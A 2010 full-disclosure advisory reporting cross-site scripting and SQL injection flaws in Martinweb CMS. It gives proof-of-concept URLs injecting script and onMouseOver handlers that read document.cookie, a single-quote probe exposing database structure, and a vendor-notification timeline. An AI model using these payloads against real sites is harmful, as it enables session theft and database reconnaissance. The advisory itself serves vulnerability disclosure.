Martinweb CMS Cross Site Scripting / SQL Injection

`Hello Full-Disclosure!  
  
I want to warn you about vulnerabilities in Martinweb CMS. It's  
Ukrainian commercial CMS (which is used particularly at web sites of  
security companies and banks).  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are possibly all versions of Martinweb CMS.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html  
  
http://site/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
XSS (with MouseOverJacking) (WASC-08):  
  
http://site/index.php?op=search&search='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'  
  
http://site/index.php?op=search&pages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'  
  
SQL DB Structure Extraction (WASC-13):  
  
http://site/index.php?pages=’  
  
------------  
Timeline:  
------------  
  
2010.10.11 - announced at my site.  
2010.10.12 - informed developers.  
2010.10.13 - additionally informed developers (because official e-mail was  
forgotten and overfull).  
2010.12.22 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/4594/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
  
`